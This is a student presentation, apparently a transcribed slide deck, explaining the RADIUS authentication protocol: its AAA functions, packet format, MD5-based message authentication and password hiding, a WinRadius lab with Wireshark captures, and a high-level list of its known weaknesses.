RADIUS (Remote Authentication Dial In User Service) is a protocol that provides authentication, authorization and accounting functionality. It is commonly used for remote access to networks using modems or VPNs. The RADIUS protocol uses UDP and runs on ports 1812 and 1813. It operates on a client-server model where the client is typically a network access server and the server handles authentication requests from clients. RADIUS provides basic security through MD5 hashing of packets and a shared secret between clients and servers. However, it is vulnerable to sniffing and spoofing attacks.

1. RADIUS (REMOTE AUTHENTICATION DIAL-IN USER SERVICE) PRESENTED BY: AMOGH UBALE CMPE-208 NETWORK ARCHITECTURE AND PROTOCOLS

2. OUTLINE Introduction to RADIUS AAA Radius Packet Format Properties of Radius Radius Security Experimentation Conclusion

3. RADIUS REMOTE AUTHENTICATION DIAL-IN USER SERVICE Developed for authentication and accounting by Livingston Enterprises in 1991 Bought by IETF RFC 2865 (RADIUS) RFC 2866 (RADIUS Accounting)

4. WHY RADIUS ? Thousands of servers located which provide different services. Different users access services provided by server. Authentication required. Authorization & Accounting also required RADIUS provides AAA functionality

5. AAA AAA stands for authentication, authorization and accounting. Authentication : verify user Authorization : services provided to the specific user Accounting : billing for service used by the user

6. FEATURES OF RADIUS Client/Server Model Network Security Flexible Authentication Mechanism Extensible Protocol

7. PACKET FORMAT OF RADIUS CODE : identifies the type of packet. Ex : 1 Access-Request , 2 Access-Accept ID : used for matching the response with the request LENGTH : identifies the length of packet including attributes AUTHENTICATOR : random value is generated in case of request and response both ATTRIBUTES : variable length and contains specific information regarding packet 1 byte CODE 1 byte ID 2 bytes LENGTH 16 bytes AUTHENTICATOR VARIABLE LENGTH ATTRIBUTES

8. GENERAL FLOWGRAPH FOR RADIUS

9. RADIUS DETAILS RADIUS uses UDP and not TCP Following are some reasons : User cannot wait for several minutes, so retransmission algorithm of TCP and ACK not required. No special handling for offline clients and servers Stateless Protocol Easy to implement multi-threaded server and provide service to multiple client requests.

10. RADIUS AND SECURITY Security is rather primitive Two main function are provided Attribute (mainly password ) hiding Authentication of messages Both of this function are performed by hash function MD5 and the shared secret

11. RADIUS MESSAGE INTEGRITY PROTECTION Access request message Request Authenticator It is a 16 byte random number that is generated by the client and added to the request authenticator field It should have global uniqueness Weak security provision Addition of message authentication

12. MESSAGE AUTHENTICATION FIELD For protection of the access request message the client calculate MD5 over the entire message using the shared secret For access request Message authenticator value =MD5(code ,length,id,request authentiactor,attributes, shared secret) For accounting request Message authenticator value =MD5(code, length, id, request, authenticator, attributes, shared secret )

13. RESPONSE AUTHENTICATOR From server to client(access reply message) Value of the response authenticator is calculated using hash MD5 Authenticator value=MD5(code, length, id, request authenticator, attributes, shared secret )

14. ATTRIBUTE HIDING User password hiding User password is less or equal than 16 octet long Client (NAS) generates a requests authenticator and concatenate it with the shared secret that the NAS shares with the radius server NAS then calculate MD5 of the concatenated and XOR the result with the user password B=MD5(request authenticator ,shared secret ) C=B XOR User Password C is filled in the user password attribute that is carried by the access request message

15. Client /server implementation Radius server :Win Radius Client :Win Radius Test Data base :Microsoft Access Win radius test Win radius Data base Access request Access reply Account request Account reply CLIENT SERVER

16. Wireshark trace of access request

17. Wireshark trace for access reply

18. Wireshark trace of accounting request

19. Wireshark trace for accounting reply

20. Wireshark trace for accounting stop request

21. VULNERABLITY OF RADIUS Static manually configured shared secret MD5 hashing method has known vulnerabilities In proxy changing there is chain of trust Transport layer protection does not exit Use of poor random generator for generation of request authenticator

22. CONCLUSION Radius is commonly used in embedded system (routers, switches, etc),which cannot handle large number of user with distinct authentication information RADIUS facilitates centralized user administration RADIUS provide certain level of protection against sniffing active attack Widely implemented by hardware vendor Diameter is an improvement over radius

23. REFERENCES 1] http://www.faqs.org/rfcs/rfc2865.html 2] BOOK: AAA network security and mobile access radius, diameter, EAP and IP mobility by Madjid Nakhjri and Mahsa Nakhjri 3] BOOK:RADIUS by Johanathan Hassell 4] http://en.wikipedia.org/wiki/RADIUS 5] http://www.itconsult2000.com/en/product/WinRadius.html

24. THANK YOU QUESTIONS ? ?